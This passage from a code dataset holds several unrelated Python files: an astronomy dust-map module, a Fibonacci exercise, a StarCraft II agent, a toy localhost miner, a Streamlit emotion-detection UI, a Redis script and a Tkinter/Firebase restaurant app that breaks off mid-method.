2015-03-02 - Started - Bovy (IAS)\n \"\"\"\n distmod= 5.*numpy.log10(d)+10.\n if isinstance(l,numpy.ndarray) or isinstance(b,numpy.ndarray):\n raise NotImplementedError(\"array input for l and b for Green et al. dust map not implemented\")\n lbIndx= self._lbIndx(l,b)\n if self._intps[lbIndx] != 0:\n out= self._intps[lbIndx][0](distmod)\n else:\n interpData=\\\n interpolate.InterpolatedUnivariateSpline(self._distmods,\n self._best_fit[lbIndx],\n k=self._interpk)\n out= interpData(distmod)\n self._intps[lbIndx]= interpData\n if self._filter is None:\n return out\n else:\n return out*aebv(self._filter,sf10=self._sf10)\n\n def dust_vals_disk(self,lcen,bcen,dist,radius):\n \"\"\"\n NAME:\n dust_vals_disk\n PURPOSE:\n return the distribution of extinction within a small disk as samples\n INPUT:\n lcen, bcen - Galactic longitude and latitude of the center of the disk (deg)\n dist - distance in kpc\n radius - radius of the disk (deg)\n OUTPUT:\n (pixarea,extinction) - arrays of pixel-area in sq rad and extinction value\n HISTORY:\n 2015-03-06 - Written - Bovy (IAS)\n \"\"\"\n # Convert the disk center to a HEALPIX vector\n vec= healpy.pixelfunc.ang2vec((90.-bcen)*_DEGTORAD,lcen*_DEGTORAD)\n distmod= 5.*numpy.log10(dist)+10.\n # Query the HEALPIX map for pixels that lie within the disk\n pixarea= []\n extinction= []\n for nside in self._nsides:\n # Find the pixels at this resolution that fall within the disk\n ipixs= healpy.query_disc(nside,vec,radius*_DEGTORAD,\n inclusive=False,nest=True)\n # Get indices of all pixels within the disk at current nside level\n nsideindx= self._pix_info['nside'] == nside\n potenIndxs= self._indexArray[nsideindx]\n nsidepix= self._pix_info['healpix_index'][nsideindx]\n # Loop through the pixels in the (small) disk\n tout= []\n for ii,ipix in enumerate(ipixs):\n lbIndx= potenIndxs[ipix == nsidepix]\n if numpy.sum(lbIndx) == 0: continue\n if self._intps[lbIndx] != 0:\n tout.append(self._intps[lbIndx][0](distmod))\n else:\n interpData=\\\n interpolate.InterpolatedUnivariateSpline(self._distmods,\n self._best_fit[lbIndx],\n k=self._interpk)\n tout.append(interpData(distmod))\n self._intps[lbIndx]= interpData\n tarea= healpy.pixelfunc.nside2pixarea(nside)\n tarea= [tarea for ii in range(len(tout))]\n pixarea.extend(tarea)\n extinction.extend(tout)\n pixarea= numpy.array(pixarea)\n extinction= numpy.array(extinction)\n if not self._filter is None:\n extinction= extinction*aebv(self._filter,sf10=self._sf10) \n return (pixarea,extinction)\n\n def _lbIndx(self,l,b):\n \"\"\"Return the index in the _greendata array corresponding to this (l,b)\"\"\"\n for nside in self._nsides:\n # Search for the pixel in this Nside level\n tpix= healpy.pixelfunc.ang2pix(nside,(90.-b)*_DEGTORAD,\n l*_DEGTORAD,nest=True)\n indx= (self._pix_info['healpix_index'] == tpix)\\\n *(self._pix_info['nside'] == nside)\n if numpy.sum(indx) == 1:\n return self._indexArray[indx]\n elif numpy.sum(indx) > 1:\n raise IndexError(\"Given (l,b) pair has multiple matches!\")\n raise IndexError(\"Given (l,b) pair not within the region covered by the Green et al. (2015) dust map\")\n\n","sub_path":"mwdust/Green15.py","file_name":"Green15.py","file_ext":"py","file_size_in_byte":7503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"191007059","text":"#Exercise5-6\n'''\nstudent name:Bruce\nID:201810701580057\nclass: network 182\n'''\n\nfib = []\n\nfib.append(0)\nfib.append(1)\nfor i in range(2,10):\n fib.append(fib[i - 2] + fib[i - 1])\n\nfor j in fib:\n print(str(j) + ',',end='')","sub_path":"Python_OOP/Exercise/Exercise 05/201810701580057 - Bruce/Exercise5-6.py","file_name":"Exercise5-6.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"41193448","text":"from pysc2.agents import base_agent\r\nfrom pysc2.env import sc2_env\r\nfrom pysc2.lib import actions, features, units\r\nfrom absl import app\r\nimport random\r\n\r\nclass ProtossAgent(base_agent.BaseAgent):\r\n\r\n def __init__(self):\r\n super(ProtossAgent, self).__init__()\r\n self.first_pylon = None\r\n self.attack_coordinates = None\r\n\r\n def unit_type_is_selected(self, obs, unit_type):\r\n if (len(obs.observation.single_select) > 0 and obs.observation.single_select[0].unit_type == unit_type):\r\n return True\r\n\r\n if (len(obs.observation.multi_select) > 0 and obs.observation.multi_select[0].unit_type == unit_type):\r\n return True\r\n\r\n return False\r\n\r\n def get_units_by_type(self, obs, unit_type):\r\n return [unit for unit in obs.observation.feature_units if unit.unit_type == unit_type]\r\n\r\n def can_do(self, obs, action):\r\n return action in obs.observation.available_actions\r\n\r\n def step(self, obs):\r\n super(ProtossAgent, self).step(obs)\r\n\r\n if obs.first():\r\n player_y, player_x = (obs.observation.feature_minimap.player_relative == features.PlayerRelative.SELF).nonzero()\r\n xmean = player_x.mean()\r\n ymean = player_y.mean()\r\n\r\n if xmean <= 31 and ymean <= 31:\r\n self.attack_coordinates = (49, 49)\r\n self.first_pylon = (60, 60)\r\n else:\r\n self.attack_coordinates = (12, 16) #X, Y\r\n self.first_pylon = (10, 10)\r\n\r\n\r\n\r\n minerals = obs.observation.player.minerals\r\n vespene = obs.observation.player.vespene\r\n \r\n \r\n #Attack\r\n zealots = self.get_units_by_type(obs, units.Protoss.Zealot)\r\n sentry = self.get_units_by_type(obs, units.Protoss.Sentry)\r\n if len(zealots) >= 7:\r\n if self.unit_type_is_selected(obs, units.Protoss.Zealot):\r\n if self.can_do(obs, actions.FUNCTIONS.Attack_minimap.id):\r\n return actions.FUNCTIONS.Attack_minimap(\"now\", self.attack_coordinates)\r\n\r\n if self.can_do(obs, actions.FUNCTIONS.select_army.id):\r\n return actions.FUNCTIONS.select_army(\"select\")\r\n \r\n \r\n if len(sentry) >= 1:\r\n if self.unit_type_is_selected(obs, units.Protoss.Sentry):\r\n if self.can_do(obs, actions.FUNCTIONS.Attack_minimap.id):\r\n return actions.FUNCTIONS.Attack_minimap(\"now\", self.attack_coordinates)\r\n\r\n if self.can_do(obs, actions.FUNCTIONS.select_army.id):\r\n return actions.FUNCTIONS.select_army(\"select\")\r\n\r\n\r\n #Pylon\r\n gates = self.get_units_by_type(obs, units.Protoss.Gateway)\r\n cybernetic = self.get_units_by_type(obs, units.Protoss.CyberneticsCore)\r\n if len(gates) == 2 and minerals >= 150 and len(cybernetic) == 0:\r\n if self.unit_type_is_selected(obs, units.Protoss.Probe):\r\n if self.can_do(obs, actions.FUNCTIONS.Build_CyberneticsCore_screen.id):\r\n x = random.randint(0, 83)\r\n y = random.randint(0, 83)\r\n return actions.FUNCTIONS.Build_CyberneticsCore_screen(\"now\", (x, y))\r\n \r\n pylons = self.get_units_by_type(obs, units.Protoss.Pylon)\r\n if len(pylons) < 4 and minerals >= 100:\r\n if self.unit_type_is_selected(obs, units.Protoss.Probe):\r\n if self.can_do(obs, actions.FUNCTIONS.Build_Pylon_screen.id):\r\n x = random.randint(0, 83)\r\n y = random.randint(0, 83)\r\n return actions.FUNCTIONS.Build_Pylon_screen(\"now\", (x, y))\r\n\r\n #Gateways\r\n #gates = self.get_units_by_type(obs, units.Protoss.Gateway)\r\n if len(gates) < 2 and minerals >= 150:\r\n if self.unit_type_is_selected(obs, units.Protoss.Probe):\r\n if self.can_do(obs, actions.FUNCTIONS.Build_Gateway_screen.id):\r\n x = random.randint(0, 83)\r\n y = random.randint(0, 83)\r\n return actions.FUNCTIONS.Build_Gateway_screen(\"now\", (x, y))\r\n\r\n gas = self.get_units_by_type(obs, units.Protoss.Assimilator)\r\n if len(gates) == 2 and minerals >= 75 and len(gas) == 0:\r\n if self.unit_type_is_selected(obs, units.Protoss.Probe):\r\n if self.can_do(obs, actions.FUNCTIONS.Build_Assimilator_screen.id):\r\n x = random.randint(0, 83)\r\n y = random.randint(0, 83)\r\n return actions.FUNCTIONS.Build_Assimilator_screen(\"now\", (x, y))\r\n \r\n\r\n #Units \r\n if len(gates) == 2 and minerals>=100:\r\n if self.unit_type_is_selected(obs, units.Protoss.Gateway):\r\n zealots = self.get_units_by_type(obs, units.Protoss.Zealot)\r\n if len(zealots) <= 7:\r\n if self.can_do(obs, actions.FUNCTIONS.Train_Zealot_quick.id):\r\n return actions.FUNCTIONS.Train_Zealot_quick(\"now\")\r\n else: \r\n z = random.choice(gates)\r\n return actions.FUNCTIONS.select_point(\"select_all_type\", (z.x, z.y))\r\n \r\n if len(cybernetic) == 1 and vespene>=100 and minerals>=50:\r\n if self.unit_type_is_selected(obs, units.Protoss.Gateway):\r\n sentry = self.get_units_by_type(obs, units.Protoss.Sentry)\r\n if len(sentry) <= 1:\r\n if self.can_do(obs, actions.FUNCTIONS.Train_Sentry_quick.id):\r\n return actions.FUNCTIONS.Train_Sentry_quick(\"now\")\r\n\r\n z = random.choice(gates)\r\n return actions.FUNCTIONS.select_point(\"select_all_type\", (z.x, z.y))\r\n \r\n #Select Probe units \r\n \r\n probes = self.get_units_by_type(obs, units.Protoss.Probe)\r\n print(len(probes))\r\n \r\n if len(probes) > 0:\r\n probe = random.choice(probes)\r\n return actions.FUNCTIONS.select_point(\"select_all_type\", (probe.x, probe.y))\r\n\r\n return actions.FUNCTIONS.no_op()\r\n\r\n\r\ndef main(unused_argv):\r\n agent = ProtossAgent()\r\n try:\r\n while True:\r\n with sc2_env.SC2Env(\r\n map_name =\"Simple64\",\r\n players=[sc2_env.Agent(sc2_env.Race.protoss),\r\n sc2_env.Bot(sc2_env.Race.random, sc2_env.Difficulty.very_easy)],\r\n agent_interface_format = features.AgentInterfaceFormat(\r\n feature_dimensions = features.Dimensions(screen=84, minimap=64),\r\n use_feature_units = True\r\n ),\r\n step_mul = 16,\r\n game_steps_per_episode = 0,\r\n visualize=True\r\n ) as env:\r\n\r\n agent.setup(env.observation_spec(), env.action_spec())\r\n timesteps = env.reset()\r\n agent.reset()\r\n\r\n while True:\r\n step_actions = [agent.step(timesteps[0])]\r\n if timesteps[0].last():\r\n break\r\n timesteps = env.step(step_actions)\r\n\r\n\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(main)","sub_path":"Protoss_agent_a01701249.py","file_name":"Protoss_agent_a01701249.py","file_ext":"py","file_size_in_byte":7254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"625959566","text":"import requests\nimport hashlib\n\nwhile True:\n r = requests.get(\"http://localhost:5000/getlatest\")\n result = r.json()\n blockHash = result[\"blockHash\"]\n targetWork = result[\"targetWork\"]\n print(blockHash)\n print(targetWork)\n\n name = \"avery\"\n i = 0\n while True:\n hashStr = \"{} {} {}\".format(blockHash, name, \"{}\".format(i))\n block_hash = hashlib.sha256(hashStr.encode(\"utf-8\")).hexdigest()\n work = 0.0\n block_hash_value = int(block_hash, 16)\n first_one = True\n first_one_count = 0\n print(block_hash)\n print(block_hash_value)\n for i in range(len(squares)):\n if block_hash_value - squares[i] < 0: # Case bit is a 0\n if first_one:\n work += 1\n else:\n work += 1 / squares[255 - first_one_count]\n first_one_count += 1\n else: # Case bit is 1\n block_hash_value = block_hash_value - squares[i]\n if first_one:\n first_one = False\n first_one_count += 1\n else:\n first_one_count += 1\n if first_one_count >= 10:\n break\n if work >= targetWork:\n r = requests.get(\"http://localhost:5000/addblock/{}/{}/{}\".format(blockHash, name, \"{}\".format(i)))\n print(r.json())\n break\n i += 1","sub_path":"projects/pset2.0_Forkable_Difficulty_Adjusting/singlecore-miner-python/miner.py","file_name":"miner.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"455777755","text":"import streamlit as st\nfrom api_call import api_call\n\nst.title(\"Emotion Detection\")\nst.write(\"\"\"\nJoy 😂, Fear 😨, Anger 😠, Sad 😟, Disgust 🤢, Shame 😳, Guilt 😓\n\"\"\")\n\noption = st.sidebar.selectbox(\n label='Which number do you like best?',\n options=(\"Logistic Regression\",\"Multinominal NB\"))\n\nst.markdown(f'You seleted: **{option}** ')\n\ntxt = st.text_area('Text to analyze',)\n\nif st.button('Predict'):\n emotion = api_call(option,txt)\n st.write(f'Emotion: { emotion.get(\"prediction\") }')","sub_path":"frontend_ui.py","file_name":"frontend_ui.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"304798835","text":"# SET A: 27 // SET *letra*: *total de nomes c/ essa letra*\nf = open(\"./initials4redis.txt\", \"w+\")\nfl = open(\"./female-names.txt\", \"r\")\ndict = {}\nfor line in fl:\n if line[0] not in dict:\n dict[line[0]] = 1\n else:\n dict[line[0]] += 1\nfor key, val in dict.items():\n f.write(\"SET {}: {}\\n\".format(key.upper(), val))\n ","sub_path":"Redis/1.2.py","file_name":"1.2.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"246731914","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 27 08:06:44 2018\r\n\r\n@author: Alexandre, Caio, Ricardo\r\n\"\"\"\r\nimport tkinter as tk\r\nimport win32com.client as wincl\r\nimport sys\r\nimport tkinter.ttk as ttk\r\nfrom PIL import ImageTk, Image\r\nimport datetime\r\nfrom firebase import firebase\r\nimportando = True\r\n \r\ntry: \r\n import speech_recognition as sr\r\n importando = False\r\nexcept:\r\n while importando:\r\n call = input(\"Não foi encontrada a biblioteca necessária para utilização do comando de voz. Deseja instalar? s/n: \")\r\n if call == \"s\":\r\n import subprocess\r\n subprocess.call([\"pip\", \"install\", \"SpeechRecognition\"])\r\n print(\"Biblioteca instalada com sucesso1\")\r\n importando = False\r\n print(\"Para fazer efeito, inicie novamente o programa!\")\r\n sys.exit()\r\n \r\n if call == \"n\":\r\n print(\"Tente novamente mais tarde.\")\r\n importando = False\r\n sys.exit()\r\n\r\n\r\nfirebase = firebase.FirebaseApplication(\"https://foodtoolsprojeto.firebaseio.com/\", None)\r\nsalao = True\r\ncozinha = False\r\nadm = False\r\ndados = firebase.get(\"\", None)\r\n ######### openpyxl\r\n \r\n\r\nlistadelojas = list()\r\nfor i in dados:\r\n listadelojas.append(i)\r\nlistadelojas.remove(\"Acesso\")\r\nclass FoodTools: \r\n \r\n \r\n def __init__(self):\r\n self.testlogin = True\r\n self.datadehoje = datetime.datetime.now()\r\n self.logins = firebase.get(\"\", None)\r\n self.menu2 = False\r\n self.menu3 = False\r\n self.mainwindow = tk.Tk()\r\n self.mainwindow.title(\"Food Tools\")\r\n self.mainwindow.geometry(\"1280x720\")\r\n color = \"sandy brown\"\r\n self.mainwindow.configure(background=color)\r\n imagem = ImageTk.PhotoImage(Image.open(\"Assets/Logo2.png\"))\r\n self.imagems = tk.Label(self.mainwindow, image = imagem, height = 282, width= 500, bg = color)\r\n self.imagems.image = imagem\r\n self.imagems.place(x = 350, y = 250)\r\n self.texto = tk.Label(self.mainwindow, font = (\"verdana\", 10), text = \"Desenvolvido por Alexandre, Caio e Ricardo - Insper - 2018\", bg = color)\r\n self.texto.place(x = 450, y = 560)\r\n self.texto1 = tk.Label(self.mainwindow, font = (\"verdana\", 10, \"italic\"), text = \"Status do banco de dados: \", bg = color)\r\n self.texto2 = tk.Label(self.mainwindow, font = (\"verdana\", 10, \"italic\"), text = \"Status do comando de voz: \", bg = color)\r\n self.texto3 = tk.Label(self.mainwindow, font = (\"verdana\", 10, \"bold\"), text = \"OK\", bg = color, fg = \"green\")\r\n self.texto4 = tk.Label(self.mainwindow, font = (\"verdana\", 10, \"bold\"), text = \"OK\", bg = color, fg = \"green\")\r\n self.texto1.place(x = 450, y = 590)\r\n self.texto2.place(x = 450, y = 610)\r\n self.texto3.place(x = 640, y = 590)\r\n self.texto4.place(x = 640, y = 610)\r\n self.canvaslogin = tk.Canvas(self.mainwindow, highlightbackground=\"saddle brown\",highlightcolor=\"black\", width = 325, height = 150, bg = \"peru\")\r\n self.canvaslogin.place(x = 900, y = 270)\r\n \r\n \r\n self.tlogin = tk.Label(self.mainwindow, text = \"Autenticação \", font = (\"Verdana\", 20), bg = \"peru\")\r\n self.usuario = tk.Label(self.mainwindow, text = \"Nome de usuário: \", font = (\"Verdana\", 10), bg = \"peru\")\r\n self.senha = tk.Label(self.mainwindow, text = \"Senha: \", font = (\"Verdana\", 10), bg = \"peru\")\r\n self.usuarioentry = tk.Entry(self.mainwindow, bg = \"peru\")\r\n self.senhaentry = tk.Entry(self.mainwindow, bg = \"peru\", show = \"*\")\r\n self.blogin = tk.Button(self.mainwindow, text = \"Login\", font = (\"verdana\", 10), bg = \"peru\", height= 2, width = 40, command = self.abrir)\r\n self.tlogin.place(x = 970, y = 285)\r\n self.usuario.place(x = 920, y = 335)\r\n self.senha.place(x = 920, y = 385)\r\n self.usuarioentry.place(x = 1050, y = 335)\r\n self.senhaentry.place(x = 1050, y = 385)\r\n self.blogin.place(x = 900, y = 485)\r\n self.imagemmic = ImageTk.PhotoImage(Image.open(\"Assets/microfone.png\"))\r\n self.voicecommand = tk.Button(self.mainwindow, bg = \"cyan\" , image = self.imagemmic, command = self.voicebutton, height= 50, width = 50)\r\n \r\n self.voicecommand.image = self.imagemmic\r\n \r\n self.sairlogin = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\", text = \"Sair (esc)\",font = (\"verdana\", 10), command = self.quits, height= 2, width = 40)\r\n self.sairlogin.place(x = 900, y = 535 )\r\n self.voicecommand.place(x= 1250, y = 500)\r\n self.mainwindow.bind(\"\", lambda e: self.abrir())\r\n \r\n \r\n \r\n def voicebutton(self):\r\n self.speak = wincl.Dispatch(\"SAPI.SpVoice\")\r\n self.r = sr.Recognizer()\r\n self.mic = sr.Microphone()\r\n\r\n\r\n with self.mic as source:\r\n self.audio = self.r.listen(source, phrase_time_limit = 1)\r\n \r\n if self.r.recognize_google(self.audio, language = \"pt-BR\") == \"entrar\":\r\n try:\r\n self.abrir()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"login\" :\r\n try:\r\n self.abrir()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"Entrar\" :\r\n try:\r\n self.abrir()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n \r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"sair\":\r\n \r\n self.speak.Speak(\"Até logo\")\r\n self.quits()\r\n return\r\n else:\r\n \r\n self.speak.Speak(\"Desculpe, não entendi. Por favor, tente novamente!\")\r\n \r\n def janelaerroedicao(self):\r\n self.janelaerro = tk.Toplevel()\r\n self.janelaerro.wm_title(\"Erro\")\r\n self.janelaerro.geometry(\"400x300\")\r\n self.janelaerro.configure(bg = \"red\")\r\n self.tituloerro = tk.Label(self.janelaerro, text = \"Seleção INVALIDA!\", bg = \"red\", font = (\"verdana\", 10))\r\n self.sairerrojanela = tk.Button(self.janelaerro, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Sair\", command = self.sairdoerro, height= 2, width = 40)\r\n self.tituloerro.place(x = 140, y = 130)\r\n self.sairerrojanela.place(x = 40, y = 180)\r\n \r\n def sairdoerro(self):\r\n self.janelaerro.destroy()\r\n def abrir(self):\r\n try: \r\n str(self.usuarioentry.get())\r\n if str(self.logins[\"Acesso\"][str(self.usuarioentry.get())][\"senha\"]) == str(self.senhaentry.get()):\r\n try: \r\n self.tituloerrologin.destroy()\r\n self.canvaserro.destroy()\r\n except:\r\n pass\r\n self.voicecommand.destroy()\r\n self.iniciar = tk.Button(self.mainwindow, text = \"Iniciar\", font = (\"verdana\", 10), bg = \"peru\", height= 2, width = 40, command = self.iniciarfranquias)\r\n self.iniciar.place(x= 900, y = 350)\r\n self.configuracoes = tk.Button(self.mainwindow, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Ajustes de franquia\", command = self.configuracoesf, height= 2, width = 40)\r\n self.configuracoes.place(x = 900, y = 400)\r\n self.sair = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\", text = \"Sair (esc)\",font = (\"verdana\", 10), command = self.quits, height= 2, width = 40)\r\n self.sair.place(x = 900, y = 450 )\r\n self.imagemmic1 = ImageTk.PhotoImage(Image.open(\"Assets/microfone.png\"))\r\n self.voicecommand1 = tk.Button(self.mainwindow, bg = \"cyan\" , image = self.imagemmic1, command = self.voicebutton1, height= 50, width = 50)\r\n self.voicecommand1.image = self.imagemmic1\r\n self.voicecommand1.place(x = 1250, y = 400)\r\n self.canvaslogin.destroy()\r\n self.blogin.destroy()\r\n self.tlogin.destroy()\r\n self.usuario.destroy()\r\n self.senha.destroy()\r\n self.usuarioentry.place_forget()\r\n self.senhaentry.place_forget()\r\n self.sairlogin.destroy()\r\n self.mainwindow.bind(\"\", lambda e: self.bloquearlogin())\r\n try:\r\n self.speak.Speak(\"Bom dia usuário\")\r\n except:\r\n pass\r\n else: \r\n self.canvaserro = tk.Canvas(self.mainwindow, highlightthickness=0, width = 328, height = 40, bg = \"indian red\")\r\n self.tituloerrologin = tk.Label(self.mainwindow, text = \"Nome de usuário e/ou senha incorretos!\", font = (\"Verdana\", 10), bg = \"indian red\")\r\n self.canvaserro.place(x = 900, y = 430)\r\n self.tituloerrologin.place(x = 910, y = 440)\r\n self.mainwindow.after(3000, self.mensagemdeerrologin)\r\n self.blogin.configure(command = self.bloquearlogin)\r\n self.mainwindow.bind(\"\", lambda e: self.bloquearlogin())\r\n except:\r\n self.canvaserro = tk.Canvas(self.mainwindow, highlightthickness=0, width = 328, height = 40, bg = \"indian red\")\r\n self.tituloerrologin = tk.Label(self.mainwindow, text = \"Nome de usuário e/ou senha incorretos!\", font = (\"Verdana\", 10), bg = \"indian red\")\r\n self.canvaserro.place(x = 900, y = 430)\r\n self.tituloerrologin.place(x = 910, y = 440)\r\n self.mainwindow.after(3000, self.mensagemdeerrologin)\r\n self.blogin.configure(command = self.bloquearlogin)\r\n self.mainwindow.bind(\"\", lambda e: self.bloquearlogin())\r\n \r\n def bloquearlogin(self):\r\n pass\r\n def voicebutton1(self):\r\n self.speak = wincl.Dispatch(\"SAPI.SpVoice\")\r\n self.r = sr.Recognizer()\r\n self.mic = sr.Microphone()\r\n\r\n\r\n with self.mic as source:\r\n self.audio = self.r.listen(source, phrase_time_limit = 1)\r\n \r\n \r\n \r\n \r\n if self.r.recognize_google(self.audio, language = \"pt-BR\") == \"iniciar\" :\r\n try:\r\n self.iniciarfranquias()\r\n self.speak.Speak(\"Iniciando lista de franquias\")\r\n \r\n \r\n except:\r\n pass\r\n return\r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"ajustes de franquia\":\r\n self.speak.Speak(\"Iniciando ajustes de franquias\")\r\n self.configuracoesf()\r\n return\r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"ajustes\":\r\n self.speak.Speak(\"Iniciando ajustes de franquias\")\r\n self.configuracoesf()\r\n return\r\n \r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"sair\":\r\n \r\n self.speak.Speak(\"Até logo\")\r\n self.quits()\r\n return\r\n \r\n else:\r\n \r\n self.speak.Speak(\"Desculpe, não entendi. Por favor, tente novamente!\")\r\n \r\n def mensagemdeerrologin(self):\r\n self.tituloerrologin.destroy()\r\n self.canvaserro.destroy()\r\n self.blogin.configure(command = self.abrir)\r\n self.mainwindow.bind(\"\", lambda e: self.abrir())\r\n \r\n \r\n def voltarlogin(self):\r\n self.errologin.destroy()\r\n self.errologin.grab_release()\r\n \r\n \r\n def quits(self):\r\n self.mainwindow.destroy()\r\n \r\n def iniciarfranquias(self):\r\n dados = firebase.get(\"\", None)\r\n listadelojas = list()\r\n for i in dados:\r\n listadelojas.append(i)\r\n listadelojas.remove(\"Acesso\")\r\n self.iniciar.destroy()\r\n \r\n self.voicecommand1.destroy()\r\n self.configuracoes.destroy()\r\n self.sair.destroy()\r\n self.lojas = tk.Label(self.mainwindow, text = \"Franquias disponíveis: \", font = (\"Verdana\", 20), bg= \"sandy brown\")\r\n self.lojas.place(x = 950, y = 200)\r\n \r\n \r\n \r\n \r\n try:\r\n len(listadelojas) == 1\r\n self.bfranquia1 =tk.Button(self.mainwindow, text = listadelojas[0], font= (\"verdana\", 10), bg = \"peru\", fg = \"black\", height= 2, width = 40, command = self.Franquia1)\r\n self.bfranquia1.place(x = 950, y = 300)\r\n except IndexError:\r\n pass\r\n \r\n try:\r\n len(listadelojas) == 2\r\n self.bfranquia2 =tk.Button(self.mainwindow, text = listadelojas[1], font= (\"verdana\", 10), bg = \"peru\", fg = \"black\", height= 2, width = 40, command = self.Franquia2)\r\n self.bfranquia2.place(x = 950, y = 350)\r\n \r\n except IndexError:\r\n pass\r\n try:\r\n len(listadelojas) == 3\r\n self.bfranquia3 =tk.Button(self.mainwindow, text = listadelojas[2], font= (\"verdana\", 10), bg = \"peru\", fg = \"black\", height= 2, width = 40, command = self.Franquia3)\r\n self.bfranquia3.place(x = 950, y = 400)\r\n except IndexError:\r\n pass\r\n \r\n try:\r\n len(listadelojas) == 4\r\n self.bfranquia4 =tk.Button(self.mainwindow, text = listadelojas[3], font= (\"verdana\", 10), bg = \"peru\", fg = \"black\", height= 2, width = 40, command = self.Franquia4)\r\n self.bfranquia4.place(x = 950, y = 450)\r\n except IndexError:\r\n pass\r\n try:\r\n len(listadelojas) == 5\r\n self.bfranquia5 =tk.Button(self.mainwindow, text = listadelojas[4], font= (\"verdana\", 10), bg = \"peru\", fg = \"black\", height= 2, width = 40, command = self.Franquia5)\r\n self.bfranquia5.place(x = 950, y = 500)\r\n \r\n except IndexError:\r\n pass \r\n \r\n self.voicecommand2 = tk.Button(self.mainwindow, bg = \"cyan\" , image = self.imagemmic1, command = self.voicebutton2, height= 50, width = 50)\r\n self.voicecommand2.image = self.imagemmic1\r\n self.voicecommand2.place(x = 1300, y = 400)\r\n \r\n \r\n \r\n def voicebutton2(self):\r\n self.speak = wincl.Dispatch(\"SAPI.SpVoice\")\r\n self.r = sr.Recognizer()\r\n self.mic = sr.Microphone()\r\n\r\n with self.mic as source:\r\n self.audio = self.r.listen(source, phrase_time_limit = 1)\r\n print(self.r.recognize_google(self.audio, language = \"pt-BR\"))\r\n \r\n \r\n \r\n \r\n if (self.r.recognize_google(self.audio, language = \"pt-BR\")).lower() == self.bfranquia1.cget(\"text\").lower():\r\n try:\r\n self.Franquia1()\r\n self.speak.Speak(\"Iniciando \" + self.bfranquia1.cget(\"text\"))\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == self.bfranquia2.cget(\"text\").lower():\r\n try:\r\n self.Franquia2()\r\n self.speak.Speak(\"Iniciando \" + self.bfranquia2.cget(\"text\"))\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == self.bfranquia3.cget(\"text\").lower():\r\n try:\r\n self.Franquia3()\r\n self.speak.Speak(\"Iniciando \" + self.bfranquia3.cget(\"text\"))\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == self.bfranquia4.cget(\"text\").lower():\r\n try:\r\n self.Franquia4()\r\n self.speak.Speak(\"Iniciando \" + self.bfranquia4.cget(\"text\"))\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == self.bfranquia5.cget(\"text\").lower():\r\n try:\r\n self.Franquia5()\r\n self.speak.Speak(\"Iniciando \" + self.bfranquia5.cget(\"text\"))\r\n \r\n \r\n except:\r\n pass\r\n return\r\n \r\n \r\n else:\r\n \r\n self.speak.Speak(\"Desculpe, não entendi. Por favor, tente novamente!\")\r\n \r\n def Franquia1(self):\r\n self.franquiaselecionada = firebase.get(self.bfranquia1.cget(\"text\"), None)\r\n self.selecionada =self.bfranquia1.cget(\"text\")\r\n self.imagems.destroy()\r\n self.texto.destroy()\r\n self.texto1.destroy()\r\n self.texto2.destroy()\r\n self.texto3.destroy()\r\n self.texto4.destroy()\r\n self.lojas.destroy()\r\n \r\n try:\r\n self.bfranquia1.destroy()\r\n self.bfranquia2.destroy()\r\n self.bfranquia3.destroy()\r\n self.bfranquia4.destroy()\r\n self.bfranquia5.destroy()\r\n except AttributeError:\r\n pass\r\n \r\n self.salao = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\" ,text=\"Salão\", font= (\"verdana\", 10), command = self.selecionarsalao, height= 2, width = 40)\r\n self.salao.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n self.cozinha = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\", text=\"Cozinha\", font= (\"verdana\", 10), command = self.selecionarcozinha, height= 2, width = 40)\r\n self.cozinha.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n \r\n self.adm = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\", text=\"Setor Administrativo\",font= (\"verdana\", 10), command = self.selecionaradm, height= 2, width = 40)\r\n self.adm.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n \r\n self.selecionarsalao()\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n def Franquia2(self):\r\n self.franquiaselecionada = firebase.get(self.bfranquia2.cget(\"text\"), None)\r\n self.selecionada = self.bfranquia2.cget(\"text\")\r\n self.imagems.destroy()\r\n self.texto.destroy()\r\n self.texto1.destroy()\r\n self.texto2.destroy()\r\n self.texto3.destroy()\r\n self.texto4.destroy()\r\n 